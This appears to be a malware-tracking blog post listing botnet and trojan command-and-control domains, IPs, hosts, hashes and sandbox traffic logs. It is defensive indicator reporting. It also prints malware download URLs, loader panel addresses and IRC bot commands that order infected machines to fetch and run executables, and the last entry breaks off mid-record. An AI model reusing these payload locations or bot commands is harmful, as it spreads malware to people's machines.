217.160.253.201(irc botnet hosted in Germany 1&1 Internet Ag)

Remote Host Port Number 217.160.253.201 2345 NICK New[USA|00|P|78527] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-2736 * 0 :COMPUTERNAME MODE New[USA|00|P|78527] -ix JOIN #!loco! PONG 22 MOTD Now talking in #!loco! Topic On: [ #!loco! ] [ .m.s|.m.e foto haaaha http://goo.gl/SgJrv?= ] Topic By: [ wd69 ]

micolosoft.in(Trojan-Ransom.Winlock hosted in United States Scranton Network Operations Center Inc)

Traffic – by DNS: micolosoft.in 184.22.188.84 poletaem002.in 199.168.139.53 mekrosoft.in 184.22.188.84 Traffic – by TCP/IP Connections: 184.22.188.84 80 199.168.139.53 80 Traffic – by URL: URL micolosoft.in/zip/gate.php?user=partner_011&uid={B31F86E0-234C-11E1-BBF6-806D6172696F}&os=2 poletaem002.in/image/gate.php?getcmd=1&uid=XANNY here it demands for user and passwd have fun finding them this is what u get if u are infected with: hosting infos: http://whois.domaintools.com/184.22.188.84

n39rfiuewh9uihc.org(Bredolab hosted in Russian Federation St. Petersburg Petersburg Internet Network Ltd)

Registry Change The following Registry Keys were changed Action Registry Changed [NTUSER/Software/Microsoft/Internet Explorer/Main/Default Feeds] Changed [NTUSER/Software/Microsoft/Internet Explorer/PhishingFilter] Changed [NTUSER/Software/Microsoft/Internet Explorer/Recovery] Traffic – by DNS: n39rfiuewh9uihc.org 146.185.242.131 Traffic – by TCP/IP Connections: 146.185.242.131 80 Traffic – by URL: URL n39rfiuewh9uihc.org/G0X7Z3vtzdpVPR4sBFa95jxTSQYAD82f.tiff n39rfiuewh9uihc.org/tBKNvbQpVYCDRSGmck4nxAaWhX.bmp xandora results here: http://www.xandora.net/xangui/malware/view/692cfa2313899607124752a9f8d88b6d hosting infos: http://whois.domaintools.com/146.185.242.131

freetop.mobi(Umbra Loader hosted in United States Fredericksburg Singlehop Inc)

Umbra Loader Panel: http://www.freetop.mobi/en/panel/Panel/ Vertexnet Loader Panel: http://mymobilewap.info/utube/bot/ Traffic – by DNS: mymobilewap.info 69.175.127.82 www.freetop.mobi 69.175.127.82 Traffic – by TCP/IP Connections: 69.175.127.82 80 Traffic – by URL: URL mymobilewap.info/utube/stel.exe mymobilewap.info/utube/server.exe www.freetop.mobi/en/panel/Panel/bot.php u can find more executables here: mymobilewap.info/utube/ Analysis results: http://www.xandora.net/xangui/malware/view/b455957506ffa7202211e7c74ecdd7bb hosting infos: http://whois.domaintools.com/69.175.127.82

6e166d1c1.com(Trojan.Win32.Jorik.Lethic.gb hosted in Canada Affilnet Corporation)

File Details MD5 55c55f7764767fd46909b95b1e64b2d1 SHA-1 964d2183f263be8bc565d3dd307486614e5d6ce1 File Type exe First Received (GMT+8) 2012-02-18 06:49:00 Size (bytes) 8704 Weightage 147 virustotal.com 29 vendors detected Static File Header ++++++++++++++++++++++++ FILE HEADER INFORMATION +++++++++++++++++++++++++ TimeStamp: 4F1DB86E Tue Jan 24 03:43:42 2012 Subsystem: 2 (Windows GUI) Image Base: 00400000 Size: 00006000 Code Base: 00001000 Size: 00001600 Data Base: 00003000

foxbid.net(irc botnet hosted in Thailand Bangkok Cat Telecom Data Comm. Dept Idc Office)

Remote Host Port Number 122.155.18.83 2345 NICK New[USA|00|P|79102] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-4584 * 0 :COMPUTERNAME MODE New[USA|00|P|79102] -ix JOIN #!loco! PONG 22 MOTD Now talking in #!loco! Topic On: [ #!loco! ] [ .m.s|.m.e haha foto 😛 http://goo.gl/W2EOO?= ] Topic By: [ wd44

webingenial.com(ngrBot hosted in Ukraine Tehnologii Budushego Llc)

Resolved : [webingenial.com] To [178.86.30.169] port 1865 Resolved : [webingenial.com] To [213.155.7.39] port 1865 Remote Host Port Number 178.86.30.169 1865 PASS ngrBot 213.155.7.39 1865 PASS ngrBot NICK n{US|XPa}rwslldg USER rwslldg 0 0 :rwslldg Now talking in #main Topic On: [ #main ] [ .m on .up http://www.creatucurso.net/ups.exe 5A551736BBC5CA8245CAB24FA0DD18BC -r ] Topic By: [ fckoffoOo ]

jer0001.in(ngrBot hosted in United States Razor Inc)

Very big botnet allready posted diferent domain names from this net here Resolved : [jer0001.in] To [208.83.233.194] port 1889 Resolved : [jer0001.in] To [208.83.232.90] port 1889 Resolved : [jer0001.in] To [208.83.234.66] port 1889 HTTP Conversations: 199.15.234.7:80 – [api.wipmania.com] Request: GET / Response: 200 “OK” 199.7.177.218:80 – [hotfile.com] Request: GET /dl/146860590/6c4cc0b/sgfdfa.exe Response: 302 “Found” 74.120.11.30:80 –

zaber.zaberhmar.com(Malware hosted in Netherlands Amsterdam Worldstream)

Resolved : [zaber.zaberhmar.com] To [109.236.86.227] Resolved : [zaber.zaberhmar.com] To [80.79.115.30] Resolved : [zaber.zaberhmar.com] To [109.236.80.114] Resolved : [zaber.zaberhmar.com] To [217.23.9.116] Resolved : [zaber.zaberhmar.com] To [94.102.56.158] Resolved : [zaber.zaberhmar.com] To [50.7.241.242] Resolved : [zaber.zaberhmar.com] To [80.82.64.69] Resolved : [zaber.zaberhmar.com] To [217.23.1.100] Resolved : [zaber.zaberhmar.com] To [217.23.7.147] TCP Connection Attempts: 109.236.80.114:8800 80.79.115.30:8800 109.236.86.227:8800 217.23.9.116:8800 94.102.56.158:8800 50.7.241.242:8800 Malware